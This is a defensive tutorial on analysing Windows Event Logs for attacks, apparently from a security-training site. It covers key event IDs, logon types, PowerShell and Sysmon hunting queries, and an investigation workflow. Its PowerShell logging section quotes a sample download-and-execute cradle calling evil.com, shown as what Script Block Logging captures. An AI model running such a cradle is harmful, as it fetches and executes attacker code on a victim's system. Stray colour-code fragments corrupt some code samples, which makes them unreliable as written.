Windows Event Log Analysis

intermediate40 minWriteup

Analyzing Windows logs for security events

Learning Objectives

  • Navigate Windows Event Viewer
  • Identify key security events
  • Detect authentication attacks
  • Find lateral movement indicators

Windows Event Logs are the digital diary of everything that happens on a Windows system. Every login, every process, every error - it's all recorded. For defenders, these logs are gold. Attackers leave traces, and those traces are in the event logs.

Think of Windows Event Logs like security camera footage for your computer. When something bad happens (or is about to), reviewing the footage shows you exactly what occurred. The challenge? There's LOTS of footage, and you need to know what to look for.

Log Retention

By default, Windows keeps limited log history. For security, increase log size limits and consider forwarding logs to a SIEM for long-term storage. You can't investigate what you didn't save!

Event Log Locations

1Windows Event Log Types:
2 
3Primary Security-Relevant Logs:
4─────────────────────────────────────────────────────────────────
5Security Log (Most Important!)
6├── Path: %SystemRoot%\System32\Winevt\Logs\Security.evtx
7├── Content: Authentication, authorization, audit events
8└── Key Events: Login/logoff, privilege use, object access
9 
10System Log
11├── Path: %SystemRoot%\System32\Winevt\Logs\System.evtx
12├── Content: System-level events, driver loading, services
13└── Key Events: Service changes, system startup/shutdown
14 
15Application Log
16├── Path: %SystemRoot%\System32\Winevt\Logs\Application.evtx
17├── Content: Application-specific events
18└── Key Events: App crashes, errors, updates
19 
20Additional Security Logs (Enable These!):
21─────────────────────────────────────────────────────────────────
22PowerShell Logs
23├── Microsoft-Windows-PowerShell/Operational
24├── Microsoft-Windows-PowerShell/Script Block Logging
25└── Critical for detecting PowerShell attacks!
26 
27Sysmon Logs (If installed - HIGHLY Recommended)
28├── Microsoft-Windows-Sysmon/Operational
29└── Process creation, network, file changes with full context
30 
31Windows Defender
32├── Microsoft-Windows-Windows Defender/Operational
33└── Malware detections and blocks
34 
35Windows Firewall
36├── Microsoft-Windows-Windows Firewall With Advanced Security
37└── Connection attempts, blocks

Critical Event IDs

1Must-Know Security Event IDs:
2 
3AUTHENTICATION EVENTS
4─────────────────────────────────────────────────────────────────
54624  │ Successful Logon
6      │ Logon Types: 2=Interactive, 3=Network, 10=RDP
7      │ Key fields: TargetUserName, LogonType, IpAddress
8
94625  │ Failed Logon
10      │ Look for: Many failures = brute force
11      │ Key fields: TargetUserName, FailureReason, IpAddress
12
134648  │ Explicit Credential Logon (runas, remote)
14      │ Suspicious: Admin running as different user
15
164672  │ Special Privileges Assigned (Admin logon)
17      │ Track: Who has elevated privileges
18
194634/4647 │ Logoff
20          │ Pair with 4624 to determine session duration
21 
22ACCOUNT MANAGEMENT
23─────────────────────────────────────────────────────────────────
244720  │ User Account Created
254722  │ User Account Enabled
264724  │ Password Reset Attempt
274725  │ User Account Disabled
284726  │ User Account Deleted
294728  │ Member Added to Security-Enabled Global Group
304732  │ Member Added to Local Group
314756  │ Member Added to Universal Security Group
32 
33PROCESS & EXECUTION
34─────────────────────────────────────────────────────────────────
354688  │ Process Creation (requires audit policy enabled)
36      │ CRITICAL for tracking command execution
37      │ Fields: NewProcessName, CommandLine, ParentProcessName
38
394689  │ Process Termination
40
414657  │ Registry Value Modified
42
437045  │ Service Installed (System Log)
44      │ Attackers often install malicious services

Enable Command Line Logging

By default, Event ID 4688 doesn't log the full command line! You must enable it via Group Policy or registry. Without command lines, you're only seeing process names - not enough for investigation.

Understanding Logon Types

1Logon Types in Event 4624:
2 
3Type 2  │ Interactive (Local console login)
4        │ User physically at the keyboard
5        │ Suspicious: 2 AM console login?
6 
7Type 3  │ Network (SMB, WMI, PowerShell Remoting)
8        │ Most common for lateral movement!
9        │ Suspicious: Workstation → Server with admin
10 
11Type 4  │ Batch (Scheduled task)
12        │ Check: What task is running?
13 
14Type 5  │ Service (Service account)
15        │ Normal for services starting
16 
17Type 7  │ Unlock (Workstation unlocked)
18        │ User returned and unlocked
19 
20Type 8  │ NetworkCleartext (IIS Basic Auth)
21        │ Credentials sent in cleartext!
22 
23Type 9  │ NewCredentials (RunAs /netonly)
24        │ Outbound connections use different creds
25 
26Type 10 │ RemoteInteractive (RDP)
27        │ Suspicious: Unexpected RDP sessions
28 
29Type 11 │ CachedInteractive (Cached credentials)
30        │ Logged in with cached domain creds
31 
32Key for Investigation:
33Type 3 + Admin account + unexpected source = INVESTIGATE!
34Type 10 from external IP = potential compromise

Detecting Attack Patterns

powershell
1606070;"># Detecting Brute Force Attacks
2606070;"># Multiple 4625 events from same source
3 
4Get-WinEvent -FilterHashtable @{
5    LogName = 606070;">#a5d6ff;">'Security'
6    Id = 4625
7    StartTime = (Get-Date).AddHours(-24)
8} | Group-Object { $_.Properties[19].Value } |
9    Where-Object { $_.Count -gt 10 } |
10    Select-Object Name, Count
11 
12606070;"># Look for: Many failures followed by 4624 success = password found!
powershell
1606070;"># Detecting Lateral Movement
2606070;"># Type 3 logins with admin privileges from workstations
3 
4Get-WinEvent -FilterHashtable @{
5    LogName = 606070;">#a5d6ff;">'Security'
6    Id = 4624
7    StartTime = (Get-Date).AddHours(-24)
8} | Where-Object {
9    $_.Properties[8].Value -eq 3 -and  606070;"># Network logon
10    $_.Properties[5].Value -match 606070;">#a5d6ff;">'admin'  # Admin account
11} | Select-Object TimeCreated,
12    @{N=606070;">#a5d6ff;">'User';E={$_.Properties[5].Value}},
13    @{N=606070;">#a5d6ff;">'SourceIP';E={$_.Properties[18].Value}}
powershell
1606070;"># Detecting Pass-the-Hash
2606070;"># Look for NTLM logons (not Kerberos) with admin accounts
3 
4Get-WinEvent -FilterHashtable @{
5    LogName = 606070;">#a5d6ff;">'Security'
6    Id = 4624
7} | Where-Object {
8    $_.Properties[10].Value -eq 606070;">#a5d6ff;">'NTLM' -and
9    $_.Properties[8].Value -eq 3
10} | Select-Object TimeCreated,
11    @{N=606070;">#a5d6ff;">'User';E={$_.Properties[5].Value}},
12    @{N=606070;">#a5d6ff;">'AuthPackage';E={$_.Properties[10].Value}},
13    @{N=606070;">#a5d6ff;">'SourceIP';E={$_.Properties[18].Value}}
powershell
1606070;"># Detecting New Service Installation
2606070;"># Event 7045 in System log
3 
4Get-WinEvent -FilterHashtable @{
5    LogName = 606070;">#a5d6ff;">'System'
6    Id = 7045
7    StartTime = (Get-Date).AddDays(-7)
8} | Select-Object TimeCreated,
9    @{N=606070;">#a5d6ff;">'ServiceName';E={$_.Properties[0].Value}},
10    @{N=606070;">#a5d6ff;">'ImagePath';E={$_.Properties[1].Value}}
11 
12606070;"># Look for:
13606070;"># - Services with suspicious names
14606070;"># - Paths to temp/unusual locations
15606070;"># - Base64 in command line

PowerShell Logging

1PowerShell Event IDs (Critical for Detecting Attacks):
2 
3Microsoft-Windows-PowerShell/Operational
4─────────────────────────────────────────────────────────────────
54103  │ Module Logging
6      │ Shows PowerShell cmdlets executed
7
84104  │ Script Block Logging (MOST IMPORTANT!)
9      │ Logs the actual code being run
10      │ Even logs decoded/deobfuscated commands!
11
124105  │ Script Block Logging Start
134106  │ Script Block Logging Stop
14 
15Enabling PowerShell Logging:
16─────────────────────────────────────────────────────────────────
17606070;"># Via Group Policy:
18606070;"># Computer Configuration → Admin Templates →
19606070;">#   Windows Components → Windows PowerShell
20 
21606070;"># Enable:
22606070;"># - Turn on Module Logging
23606070;"># - Turn on PowerShell Script Block Logging
24606070;"># - Turn on PowerShell Transcription (optional)
25 
26Example Malicious Script Block (4104):
27─────────────────────────────────────────────────────────────────
28ScriptBlockText: IEX (New-Object Net.WebClient).DownloadString
29                (606070;">#a5d6ff;">'http://evil.com/payload.ps1')
30 
31This reveals:
32- Downloading and executing remote script
33- Attacker C2 server: evil.com
34- Exact payload name: payload.ps1

Script Block Logging Magic

Even if attackers use -EncodedCommand or heavy obfuscation, Script Block Logging (4104) captures the DECODED version when PowerShell actually executes it. This is incredibly powerful for analysis!

Sysmon - Enhanced Logging

1Sysmon (System Monitor) - Must-Have for Detection:
2 
3Installation:
4sysmon64 -accepteula -i sysmonconfig.xml
5 
6Key Sysmon Event IDs:
7─────────────────────────────────────────────────────────────────
8Event 1  │ Process Creation (Better than 4688!)
9         │ Includes: CommandLine, ParentImage, Hashes, User
10
11Event 3  │ Network Connection
12         │ Tracks outbound connections per process
13         │ Essential for C2 detection
14
15Event 7  │ Image Loaded (DLL loading)
16         │ Detect DLL hijacking, side-loading
17
18Event 8  │ CreateRemoteThread
19         │ Process injection detection
20
21Event 10 │ Process Access
22         │ Credential dumping (lsass access)
23
24Event 11 │ FileCreate
25         │ Track file drops to disk
26
27Event 12/13/14 │ Registry Events
28               │ Persistence mechanisms
29
30Event 22 │ DNS Query
31         │ Track DNS for C2, data exfil
32 
33Why Sysmon vs Native Logging:
34├── More detail (hashes, parent process)
35├── Network connections per process
36├── Highly configurable
37└── Community configs available (SwiftOnSecurity, olafhartong)
powershell
1606070;"># Query Sysmon Process Creation
2Get-WinEvent -FilterHashtable @{
3    LogName = 606070;">#a5d6ff;">'Microsoft-Windows-Sysmon/Operational'
4    Id = 1
5    StartTime = (Get-Date).AddHours(-24)
6} | Where-Object {
7    $_.Properties[4].Value -like 606070;">#a5d6ff;">'*powershell*' -or
8    $_.Properties[4].Value -like 606070;">#a5d6ff;">'*cmd*'
9} | Select-Object TimeCreated,
10    @{N=606070;">#a5d6ff;">'CommandLine';E={$_.Properties[10].Value}},
11    @{N=606070;">#a5d6ff;">'ParentImage';E={$_.Properties[20].Value}}
12 
13606070;"># Query Sysmon Network Connections
14Get-WinEvent -FilterHashtable @{
15    LogName = 606070;">#a5d6ff;">'Microsoft-Windows-Sysmon/Operational'
16    Id = 3
17} | Where-Object {
18    $_.Properties[6].Value -eq $false  606070;"># Not internal
19} | Select-Object TimeCreated,
20    @{N=606070;">#a5d6ff;">'Image';E={$_.Properties[4].Value}},
21    @{N=606070;">#a5d6ff;">'DestIP';E={$_.Properties[14].Value}},
22    @{N=606070;">#a5d6ff;">'DestPort';E={$_.Properties[16].Value}}

Log Analysis Tools

bash
1606070;"># Tools for Analyzing Windows Event Logs
2 
3606070;"># 1. Event Viewer (GUI)
4eventvwr.msc
5606070;"># Built-in, good for browsing, limited for large volumes
6 
7606070;"># 2. PowerShell Get-WinEvent (Command Line)
8Get-WinEvent -FilterHashtable @{LogName=606070;">#a5d6ff;">'Security';Id=4624}
9606070;"># Flexible, scriptable, great for hunting
10 
11606070;"># 3. LogParser (Microsoft - Free)
12logparser 606070;">#a5d6ff;">"SELECT * FROM Security WHERE EventID=4625"
13606070;"># SQL-like queries, fast for large files
14 
15606070;"># 4. EvtxECmd (Eric Zimmerman - Free)
16EvtxECmd.exe -d C:\Logs --csv C:\Output
17606070;"># Parses EVTX to CSV for easy analysis
18606070;"># Great for IR, works on offline logs
19 
20606070;"># 5. Chainsaw (Free - Rust-based)
21chainsaw hunt evtxfiles/ --rules sigma-rules/
22606070;"># Applies Sigma rules to EVTX files
23606070;"># Perfect for rapid detection
24 
25606070;"># 6. Hayabusa (Free - Fast Timeline)
26hayabusa -d evtxfiles/ -o timeline.csv
27606070;"># Creates attack timeline from logs
28606070;"># Uses Sigma rules, very fast
29 
30606070;"># Example: Hunt with Chainsaw
31./chainsaw hunt C:\Windows\System32\winevt\Logs \
32  --rules ./sigma/rules/windows \
33  --mapping ./mappings/sigma-event-logs-all.yml

Investigation Workflow

1Example Investigation: Suspected Compromise
2═══════════════════════════════════════════════════════════════
3 
4Scenario: User reports strange behavior on workstation
5 
6STEP 1: Check Authentication
7─────────────────────────────────────────────────────────────────
8606070;"># Recent successful logins
9Get-WinEvent -FilterHashtable @{LogName=606070;">#a5d6ff;">'Security';Id=4624} |
10  Select -First 50
11 
12Questions:
13├── Any unusual logon types (10=RDP from unexpected source)?
14├── Any network logons (type 3) from other workstations?
15└── Any service account logins (type 5) at odd times?
16 
17STEP 2: Check for Failed Logins
18─────────────────────────────────────────────────────────────────
19606070;"># Brute force attempts?
20Get-WinEvent -FilterHashtable @{LogName=606070;">#a5d6ff;">'Security';Id=4625} |
21  Group { $_.Properties[19].Value } | Sort Count -Desc
22 
23STEP 3: Check Process Creation
24─────────────────────────────────────────────────────────────────
25606070;"># What ran on this system?
26Get-WinEvent -FilterHashtable @{LogName=606070;">#a5d6ff;">'Security';Id=4688} |
27  Select TimeCreated, @{N=606070;">#a5d6ff;">'Process';E={$_.Properties[5].Value}}
28 
29Look for:
30├── PowerShell with encoded commands
31├── Processes from temp folders
32├── Unusual parent-child relationships
33└── Reconnaissance commands (whoami, net user, etc.)
34 
35STEP 4: Check PowerShell
36─────────────────────────────────────────────────────────────────
37Get-WinEvent -FilterHashtable @{
38  LogName=606070;">#a5d6ff;">'Microsoft-Windows-PowerShell/Operational'
39  Id=4104
40}
41 
42Look for:
43├── Download cradles (IEX, WebClient)
44├── Encoded commands decoded
45└── Reconnaissance scripts
46 
47STEP 5: Check New Services
48─────────────────────────────────────────────────────────────────
49Get-WinEvent -FilterHashtable @{LogName=606070;">#a5d6ff;">'System';Id=7045}
50 
51Look for:
52├── Services with random names
53├── Unusual binary paths
54└── Services created around incident time
55 
56STEP 6: Build Timeline
57─────────────────────────────────────────────────────────────────
58Correlate all findings with timestamps:
5914:23:00 - Failed RDP login from 192.168.1.50
6014:23:15 - Successful login (password guessed?)
6114:24:00 - PowerShell executed download cradle
6214:25:00 - New service installed for persistence
6314:26:00 - Network connection to external IP

Log Analysis Methodology

Windows Event Log Investigation

1
Define ScopeWhat system, what timeframe, what behavior?
2
Check Authentication4624/4625/4672 - Who logged in?
3
Check Execution4688/Sysmon 1 - What ran?
4
Check PowerShell4104 - What scripts executed?
5
Check Persistence7045/4698/Sysmon 12-14 - What stayed?
6
Check NetworkSysmon 3/Firewall - Where connected?
7
Build TimelineCorrelate events chronologically

Knowledge Check

Quick Quiz
Question 1 of 3

Which Event ID indicates a successful logon?

Challenges

Hunt the Brute Force

Challenge
🔥 intermediate

Write a PowerShell command to find all failed login attempts (4625) in the last 24 hours, grouped by source IP, showing counts above 5 attempts.

Need a hint? (4 available)

Key Takeaways

  • Security log is most important: 4624 (success), 4625 (fail), 4688 (process)
  • Logon Type 3 (network) + admin account = potential lateral movement
  • Enable PowerShell Script Block Logging (4104) - catches decoded commands
  • Install Sysmon for enhanced process, network, and registry logging
  • Tools like Chainsaw and Hayabusa apply Sigma rules to EVTX files
  • Always build a timeline when investigating incidents